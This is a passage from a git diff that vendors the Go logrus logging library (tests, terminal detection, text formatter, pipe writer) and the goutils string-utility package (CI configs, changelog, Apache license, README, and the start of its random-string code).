log.WithField("time", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["fields.time"], "hello") + }) +} + +func TestUserSuppliedLevelFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("level", 1).Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["level"], "info") + assert.Equal(t, fields["fields.level"], 1.0) // JSON has floats only + }) +} + +func TestDefaultFieldsAreNotPrefixed(t *testing.T) { + LogAndAssertText(t, func(log *Logger) { + ll := log.WithField("herp", "derp") + ll.Info("hello") + ll.Info("bye") + }, func(fields map[string]string) { + for _, fieldName := range []string{"fields.level", "fields.time", "fields.msg"} { + if _, ok := fields[fieldName]; ok { + t.Fatalf("should not have prefixed %q: %v", fieldName, fields) + } + } + }) +} + +func TestDoubleLoggingDoesntPrefixPreviousFields(t *testing.T) { + + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + llog := logger.WithField("context", "eating raw fish") + + llog.Info("looks delicious") + + err := json.Unmarshal(buffer.Bytes(), &fields) + assert.NoError(t, err, "should have decoded first message") + assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields") + assert.Equal(t, fields["msg"], "looks delicious") + assert.Equal(t, fields["context"], "eating raw fish") + + buffer.Reset() + + llog.Warn("omg it is!") + + err = json.Unmarshal(buffer.Bytes(), &fields) + assert.NoError(t, err, "should have decoded second message") + assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields") + assert.Equal(t, fields["msg"], "omg it is!") + assert.Equal(t, fields["context"], "eating raw fish") + assert.Nil(t, fields["fields.msg"], "should not have prefixed previous `msg` entry") + +} + +func TestConvertLevelToString(t *testing.T) { + assert.Equal(t, "debug", DebugLevel.String()) + assert.Equal(t, "info", 
InfoLevel.String()) + assert.Equal(t, "warning", WarnLevel.String()) + assert.Equal(t, "error", ErrorLevel.String()) + assert.Equal(t, "fatal", FatalLevel.String()) + assert.Equal(t, "panic", PanicLevel.String()) +} + +func TestParseLevel(t *testing.T) { + l, err := ParseLevel("panic") + assert.Nil(t, err) + assert.Equal(t, PanicLevel, l) + + l, err = ParseLevel("PANIC") + assert.Nil(t, err) + assert.Equal(t, PanicLevel, l) + + l, err = ParseLevel("fatal") + assert.Nil(t, err) + assert.Equal(t, FatalLevel, l) + + l, err = ParseLevel("FATAL") + assert.Nil(t, err) + assert.Equal(t, FatalLevel, l) + + l, err = ParseLevel("error") + assert.Nil(t, err) + assert.Equal(t, ErrorLevel, l) + + l, err = ParseLevel("ERROR") + assert.Nil(t, err) + assert.Equal(t, ErrorLevel, l) + + l, err = ParseLevel("warn") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("WARN") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("warning") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("WARNING") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("info") + assert.Nil(t, err) + assert.Equal(t, InfoLevel, l) + + l, err = ParseLevel("INFO") + assert.Nil(t, err) + assert.Equal(t, InfoLevel, l) + + l, err = ParseLevel("debug") + assert.Nil(t, err) + assert.Equal(t, DebugLevel, l) + + l, err = ParseLevel("DEBUG") + assert.Nil(t, err) + assert.Equal(t, DebugLevel, l) + + l, err = ParseLevel("invalid") + assert.Equal(t, "not a valid logrus Level: \"invalid\"", err.Error()) +} + +func TestGetSetLevelRace(t *testing.T) { + wg := sync.WaitGroup{} + for i := 0; i < 100; i++ { + wg.Add(1) + go func(i int) { + defer wg.Done() + if i%2 == 0 { + SetLevel(InfoLevel) + } else { + GetLevel() + } + }(i) + + } + wg.Wait() +} + +func TestLoggingRace(t *testing.T) { + logger := New() + + var wg sync.WaitGroup + wg.Add(100) + + for i := 0; i < 100; i++ { + go func() { + logger.Info("info") + wg.Done() + }() 
+ } + wg.Wait() +} + +// Compile test +func TestLogrusInterface(t *testing.T) { + var buffer bytes.Buffer + fn := func(l FieldLogger) { + b := l.WithField("key", "value") + b.Debug("Test") + } + // test logger + logger := New() + logger.Out = &buffer + fn(logger) + + // test Entry + e := logger.WithField("another", "value") + fn(e) +} + +// Implements io.Writer using channels for synchronization, so we can wait on +// the Entry.Writer goroutine to write in a non-racey way. This does assume that +// there is a single call to Logger.Out for each message. +type channelWriter chan []byte + +func (cw channelWriter) Write(p []byte) (int, error) { + cw <- p + return len(p), nil +} + +func TestEntryWriter(t *testing.T) { + cw := channelWriter(make(chan []byte, 1)) + log := New() + log.Out = cw + log.Formatter = new(JSONFormatter) + log.WithField("foo", "bar").WriterLevel(WarnLevel).Write([]byte("hello\n")) + + bs := <-cw + var fields Fields + err := json.Unmarshal(bs, &fields) + assert.Nil(t, err) + assert.Equal(t, fields["foo"], "bar") + assert.Equal(t, fields["level"], "warning") +} diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go new file mode 100644 index 0000000000..4880d13d26 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go @@ -0,0 +1,10 @@ +// +build darwin freebsd openbsd netbsd dragonfly +// +build !appengine,!gopherjs + +package logrus + +import "golang.org/x/sys/unix" + +const ioctlReadTermios = unix.TIOCGETA + +type Termios unix.Termios diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go new file mode 100644 index 0000000000..3de08e802f --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go @@ -0,0 +1,11 @@ +// +build appengine gopherjs + +package logrus + +import ( + "io" +) + +func checkIfTerminal(w io.Writer) bool { + return true +} diff --git 
a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go new file mode 100644 index 0000000000..067047a123 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go @@ -0,0 +1,19 @@ +// +build !appengine,!gopherjs + +package logrus + +import ( + "io" + "os" + + "golang.org/x/crypto/ssh/terminal" +) + +func checkIfTerminal(w io.Writer) bool { + switch v := w.(type) { + case *os.File: + return terminal.IsTerminal(int(v.Fd())) + default: + return false + } +} diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/Sirupsen/logrus/terminal_linux.go new file mode 100644 index 0000000000..f29a0097c8 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_linux.go @@ -0,0 +1,14 @@ +// Based on ssh/terminal: +// Copyright 2013 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// +build !appengine,!gopherjs + +package logrus + +import "golang.org/x/sys/unix" + +const ioctlReadTermios = unix.TCGETS + +type Termios unix.Termios diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go b/vendor/github.com/Sirupsen/logrus/text_formatter.go new file mode 100644 index 0000000000..61b21caea4 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/text_formatter.go @@ -0,0 +1,178 @@ +package logrus + +import ( + "bytes" + "fmt" + "sort" + "strings" + "sync" + "time" +) + +const ( + nocolor = 0 + red = 31 + green = 32 + yellow = 33 + blue = 36 + gray = 37 +) + +var ( + baseTimestamp time.Time +) + +func init() { + baseTimestamp = time.Now() +} + +// TextFormatter formats logs into text +type TextFormatter struct { + // Set to true to bypass checking for a TTY before outputting colors. + ForceColors bool + + // Force disabling colors. + DisableColors bool + + // Disable timestamp logging. 
useful when output is redirected to logging + // system that already adds timestamps. + DisableTimestamp bool + + // Enable logging the full timestamp when a TTY is attached instead of just + // the time passed since beginning of execution. + FullTimestamp bool + + // TimestampFormat to use for display when a full timestamp is printed + TimestampFormat string + + // The fields are sorted by default for a consistent output. For applications + // that log extremely frequently and don't use the JSON formatter this may not + // be desired. + DisableSorting bool + + // QuoteEmptyFields will wrap empty fields in quotes if true + QuoteEmptyFields bool + + // Whether the logger's out is to a terminal + isTerminal bool + + sync.Once +} + +func (f *TextFormatter) init(entry *Entry) { + if entry.Logger != nil { + f.isTerminal = checkIfTerminal(entry.Logger.Out) + } +} + +// Format renders a single log entry +func (f *TextFormatter) Format(entry *Entry) ([]byte, error) { + var b *bytes.Buffer + keys := make([]string, 0, len(entry.Data)) + for k := range entry.Data { + keys = append(keys, k) + } + + if !f.DisableSorting { + sort.Strings(keys) + } + if entry.Buffer != nil { + b = entry.Buffer + } else { + b = &bytes.Buffer{} + } + + prefixFieldClashes(entry.Data) + + f.Do(func() { f.init(entry) }) + + isColored := (f.ForceColors || f.isTerminal) && !f.DisableColors + + timestampFormat := f.TimestampFormat + if timestampFormat == "" { + timestampFormat = defaultTimestampFormat + } + if isColored { + f.printColored(b, entry, keys, timestampFormat) + } else { + if !f.DisableTimestamp { + f.appendKeyValue(b, "time", entry.Time.Format(timestampFormat)) + } + f.appendKeyValue(b, "level", entry.Level.String()) + if entry.Message != "" { + f.appendKeyValue(b, "msg", entry.Message) + } + for _, key := range keys { + f.appendKeyValue(b, key, entry.Data[key]) + } + } + + b.WriteByte('\n') + return b.Bytes(), nil +} + +func (f *TextFormatter) printColored(b *bytes.Buffer, entry *Entry, keys 
[]string, timestampFormat string) { + var levelColor int + switch entry.Level { + case DebugLevel: + levelColor = gray + case WarnLevel: + levelColor = yellow + case ErrorLevel, FatalLevel, PanicLevel: + levelColor = red + default: + levelColor = blue + } + + levelText := strings.ToUpper(entry.Level.String())[0:4] + + if f.DisableTimestamp { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m %-44s ", levelColor, levelText, entry.Message) + } else if !f.FullTimestamp { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%04d] %-44s ", levelColor, levelText, int(entry.Time.Sub(baseTimestamp)/time.Second), entry.Message) + } else { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%s] %-44s ", levelColor, levelText, entry.Time.Format(timestampFormat), entry.Message) + } + for _, k := range keys { + v := entry.Data[k] + fmt.Fprintf(b, " \x1b[%dm%s\x1b[0m=", levelColor, k) + f.appendValue(b, v) + } +} + +func (f *TextFormatter) needsQuoting(text string) bool { + if f.QuoteEmptyFields && len(text) == 0 { + return true + } + for _, ch := range text { + if !((ch >= 'a' && ch <= 'z') || + (ch >= 'A' && ch <= 'Z') || + (ch >= '0' && ch <= '9') || + ch == '-' || ch == '.' 
|| ch == '_' || ch == '/' || ch == '@' || ch == '^' || ch == '+') { + return true + } + } + return false +} + +func (f *TextFormatter) appendKeyValue(b *bytes.Buffer, key string, value interface{}) { + if b.Len() > 0 { + b.WriteByte(' ') + } + b.WriteString(key) + b.WriteByte('=') + f.appendValue(b, value) +} + +func (f *TextFormatter) appendValue(b *bytes.Buffer, value interface{}) { + stringVal, ok := value.(string) + if !ok { + stringVal = fmt.Sprint(value) + } + + if !f.needsQuoting(stringVal) { + b.WriteString(stringVal) + } else { + b.WriteString(fmt.Sprintf("%q", stringVal)) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go new file mode 100644 index 0000000000..d93b931e51 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go @@ -0,0 +1,141 @@ +package logrus + +import ( + "bytes" + "errors" + "fmt" + "strings" + "testing" + "time" +) + +func TestFormatting(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + testCases := []struct { + value string + expected string + }{ + {`foo`, "time=\"0001-01-01T00:00:00Z\" level=panic test=foo\n"}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + + if string(b) != tc.expected { + t.Errorf("formatting expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestQuoting(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + checkQuoting := func(q bool, value interface{}) { + b, _ := tf.Format(WithField("test", value)) + idx := bytes.Index(b, ([]byte)("test=")) + cont := bytes.Contains(b[idx+5:], []byte("\"")) + if cont != q { + if q { + t.Errorf("quoting expected for: %#v", value) + } else { + t.Errorf("quoting not expected for: %#v", value) + } + } + } + + checkQuoting(false, "") + checkQuoting(false, "abcd") + checkQuoting(false, "v1.0") + checkQuoting(false, "1234567890") + checkQuoting(false, "/foobar") + 
checkQuoting(false, "foo_bar") + checkQuoting(false, "foo@bar") + checkQuoting(false, "foobar^") + checkQuoting(false, "+/-_^@f.oobar") + checkQuoting(true, "foobar$") + checkQuoting(true, "&foobar") + checkQuoting(true, "x y") + checkQuoting(true, "x,y") + checkQuoting(false, errors.New("invalid")) + checkQuoting(true, errors.New("invalid argument")) + + // Test for quoting empty fields. + tf.QuoteEmptyFields = true + checkQuoting(true, "") + checkQuoting(false, "abcd") + checkQuoting(true, errors.New("invalid argument")) +} + +func TestEscaping(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + testCases := []struct { + value string + expected string + }{ + {`ba"r`, `ba\"r`}, + {`ba'r`, `ba'r`}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + if !bytes.Contains(b, []byte(tc.expected)) { + t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestEscaping_Interface(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + ts := time.Now() + + testCases := []struct { + value interface{} + expected string + }{ + {ts, fmt.Sprintf("\"%s\"", ts.String())}, + {errors.New("error: something went wrong"), "\"error: something went wrong\""}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + if !bytes.Contains(b, []byte(tc.expected)) { + t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestTimestampFormat(t *testing.T) { + checkTimeStr := func(format string) { + customFormatter := &TextFormatter{DisableColors: true, TimestampFormat: format} + customStr, _ := customFormatter.Format(WithField("test", "test")) + timeStart := bytes.Index(customStr, ([]byte)("time=")) + timeEnd := bytes.Index(customStr, ([]byte)("level=")) + timeStr := customStr[timeStart+5+len("\"") : timeEnd-1-len("\"")] + if format == "" { + format = time.RFC3339 + } + _, e := 
time.Parse(format, (string)(timeStr)) + if e != nil { + t.Errorf("time string \"%s\" did not match provided time format \"%s\": %s", timeStr, format, e) + } + } + + checkTimeStr("2006-01-02T15:04:05.000000000Z07:00") + checkTimeStr("Mon Jan _2 15:04:05 2006") + checkTimeStr("") +} + +func TestDisableTimestampWithColoredOutput(t *testing.T) { + tf := &TextFormatter{DisableTimestamp: true, ForceColors: true} + + b, _ := tf.Format(WithField("test", "test")) + if strings.Contains(string(b), "[0000]") { + t.Error("timestamp not expected when DisableTimestamp is true") + } +} + +// TODO add tests for sorting etc., this requires a parser for the text +// formatter output. diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/Sirupsen/logrus/writer.go new file mode 100644 index 0000000000..7bdebedc60 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/writer.go @@ -0,0 +1,62 @@ +package logrus + +import ( + "bufio" + "io" + "runtime" +) + +func (logger *Logger) Writer() *io.PipeWriter { + return logger.WriterLevel(InfoLevel) +} + +func (logger *Logger) WriterLevel(level Level) *io.PipeWriter { + return NewEntry(logger).WriterLevel(level) +} + +func (entry *Entry) Writer() *io.PipeWriter { + return entry.WriterLevel(InfoLevel) +} + +func (entry *Entry) WriterLevel(level Level) *io.PipeWriter { + reader, writer := io.Pipe() + + var printFunc func(args ...interface{}) + + switch level { + case DebugLevel: + printFunc = entry.Debug + case InfoLevel: + printFunc = entry.Info + case WarnLevel: + printFunc = entry.Warn + case ErrorLevel: + printFunc = entry.Error + case FatalLevel: + printFunc = entry.Fatal + case PanicLevel: + printFunc = entry.Panic + default: + printFunc = entry.Print + } + + go entry.writerScanner(reader, printFunc) + runtime.SetFinalizer(writer, writerFinalizer) + + return writer +} + +func (entry *Entry) writerScanner(reader *io.PipeReader, printFunc func(args ...interface{})) { + scanner := bufio.NewScanner(reader) + for 
scanner.Scan() { + printFunc(scanner.Text()) + } + if err := scanner.Err(); err != nil { + entry.Errorf("Error while reading from Writer: %s", err) + } + reader.Close() +} + +func writerFinalizer(writer *io.PipeWriter) { + writer.Close() +} diff --git a/vendor/github.com/aokoli/goutils/.travis.yml b/vendor/github.com/aokoli/goutils/.travis.yml new file mode 100644 index 0000000000..4025e01ec4 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/.travis.yml @@ -0,0 +1,18 @@ +language: go + +go: + - 1.6 + - 1.7 + - 1.8 + - tip + +script: + - go test -v + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/aokoli/goutils/CHANGELOG.md b/vendor/github.com/aokoli/goutils/CHANGELOG.md new file mode 100644 index 0000000000..d700ec47f2 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/CHANGELOG.md @@ -0,0 +1,8 @@ +# 1.0.1 (2017-05-31) + +## Fixed +- #21: Fix generation of alphanumeric strings (thanks @dbarranco) + +# 1.0.0 (2014-04-30) + +- Initial release. diff --git a/vendor/github.com/aokoli/goutils/LICENSE.txt b/vendor/github.com/aokoli/goutils/LICENSE.txt new file mode 100644 index 0000000000..d645695673 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. 
+ + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. 
+ + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of 
the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
+ + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
diff --git a/vendor/github.com/aokoli/goutils/README.md b/vendor/github.com/aokoli/goutils/README.md new file mode 100644 index 0000000000..163ffe72a8 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/README.md @@ -0,0 +1,70 @@ +GoUtils +=========== +[![Stability: Maintenance](https://masterminds.github.io/stability/maintenance.svg)](https://masterminds.github.io/stability/maintenance.html) +[![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) [![Build Status](https://travis-ci.org/Masterminds/goutils.svg?branch=master)](https://travis-ci.org/Masterminds/goutils) [![Build status](https://ci.appveyor.com/api/projects/status/sc2b1ew0m7f0aiju?svg=true)](https://ci.appveyor.com/project/mattfarina/goutils) + + +GoUtils provides users with utility functions to manipulate strings in various ways. It is a Go implementation of some +string manipulation libraries of Java Apache Commons. GoUtils includes the following Java Apache Commons classes: +* WordUtils +* RandomStringUtils +* StringUtils (partial implementation) + +## Installation +If you have Go set up on your system, from the GOPATH directory within the command line/terminal, enter this: + + go get github.com/Masterminds/goutils + +If you do not have Go set up on your system, please follow the [Go installation directions from the documenation](http://golang.org/doc/install), and then follow the instructions above to install GoUtils. + + +## Documentation +GoUtils doc is available here: [![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) + + +## Usage +The code snippets below show examples of how to use GoUtils. Some functions return errors while others do not. The first instance below, which does not return an error, is the `Initials` function (located within the `wordutils.go` file). 
+ + package main + + import ( + "fmt" + "github.com/Masterminds/goutils" + ) + + func main() { + + // EXAMPLE 1: A goutils function which returns no errors + fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF" + + } +Some functions return errors mainly due to illegal arguements used as parameters. The code example below illustrates how to deal with function that returns an error. In this instance, the function is the `Random` function (located within the `randomstringutils.go` file). + + package main + + import ( + "fmt" + "github.com/Masterminds/goutils" + ) + + func main() { + + // EXAMPLE 2: A goutils function which returns an error + rand1, err1 := goutils.Random (-1, 0, 0, true, true) + + if err1 != nil { + fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...) + } else { + fmt.Println(rand1) + } + + } + +## License +GoUtils is licensed under the Apache License, Version 2.0. Please check the LICENSE.txt file or visit http://www.apache.org/licenses/LICENSE-2.0 for a copy of the license. 
+ +## Issue Reporting +Make suggestions or report issues using the Git issue tracker: https://github.com/Masterminds/goutils/issues + +## Website +* [GoUtils webpage](http://Masterminds.github.io/goutils/) diff --git a/vendor/github.com/aokoli/goutils/appveyor.yml b/vendor/github.com/aokoli/goutils/appveyor.yml new file mode 100644 index 0000000000..657564a847 --- /dev/null +++ b/vendor/github.com/aokoli/goutils/appveyor.yml @@ -0,0 +1,21 @@ +version: build-{build}.{branch} + +clone_folder: C:\gopath\src\github.com\Masterminds\goutils +shallow_clone: true + +environment: + GOPATH: C:\gopath + +platform: + - x64 + +build: off + +install: + - go version + - go env + +test_script: + - go test -v + +deploy: off diff --git a/vendor/github.com/aokoli/goutils/randomstringutils.go b/vendor/github.com/aokoli/goutils/randomstringutils.go new file mode 100644 index 0000000000..1364e0cafd --- /dev/null +++ b/vendor/github.com/aokoli/goutils/randomstringutils.go @@ -0,0 +1,268 @@ +/* +Copyright 2014 Alexander Okoli + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +*/ + +package goutils + +import ( + "fmt" + "math" + "math/rand" + "regexp" + "time" + "unicode" +) + +// RANDOM provides the time-based seed used to generate random numbers +var RANDOM = rand.New(rand.NewSource(time.Now().UnixNano())) + +/* +RandomNonAlphaNumeric creates a random string whose length is the number of characters specified. 
+Characters will be chosen from the set of all characters (ASCII/Unicode values between 0 to 2,147,483,647 (math.MaxInt32)). + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomNonAlphaNumeric(count int) (string, error) { + return RandomAlphaNumericCustom(count, false, false) +} + +/* +RandomAscii creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of characters whose ASCII value is between 32 and 126 (inclusive). + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomAscii(count int) (string, error) { + return Random(count, 32, 127, false, false) +} + +/* +RandomNumeric creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of numeric characters. + +Parameter: + count - the length of random string to create + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) +*/ +func RandomNumeric(count int) (string, error) { + return Random(count, 0, 0, false, true) +} + +/* +RandomAlphabetic creates a random string whose length is the number of characters specified. +Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments. + +Parameters: + count - the length of random string to create + letters - if true, generated string may include alphabetic characters + numbers - if true, generated string may include numeric characters + +Returns: + string - the random string + error - an error stemming from an invalid parameter within underlying function, RandomSeed(...) 
